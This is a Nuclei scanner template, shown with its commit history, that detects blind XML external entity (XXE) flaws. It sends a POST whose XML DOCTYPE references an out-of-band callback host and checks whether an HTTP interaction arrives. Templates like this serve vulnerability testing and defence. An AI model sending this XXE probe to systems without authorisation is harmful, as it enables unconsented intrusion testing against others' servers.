nuclei-templates/http/vulnerabilities/generic/generic-blind-xxe.yaml

31 lines
797 B
YAML
Raw Normal View History

2021-08-17 11:48:52 +00:00
id: generic-blind-xxe
info:
name: Generic Blind XXE
author: geeknik
severity: high
2024-01-02 15:45:12 +00:00
description: This template detects Generic Blind XXE.
metadata:
max-request: 1
2023-10-14 11:27:55 +00:00
tags: xxe,generic,blind
2021-08-17 11:48:52 +00:00
http:
2021-08-17 11:48:52 +00:00
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: {{BaseURL}}
2021-08-20 11:07:22 +00:00
2021-08-17 11:48:52 +00:00
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
<foo>&e1;</foo>
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 490a00463044022051ebe2060d9ee98554782b4c73d862fb964a8c898d861d34d6ba0d70f4098ba502200c7eb3168c944892680805ddaa78d8427909d1b0fea308cf9e6c30c805b9edf5:922c64590222798bb761d5b6d8e72950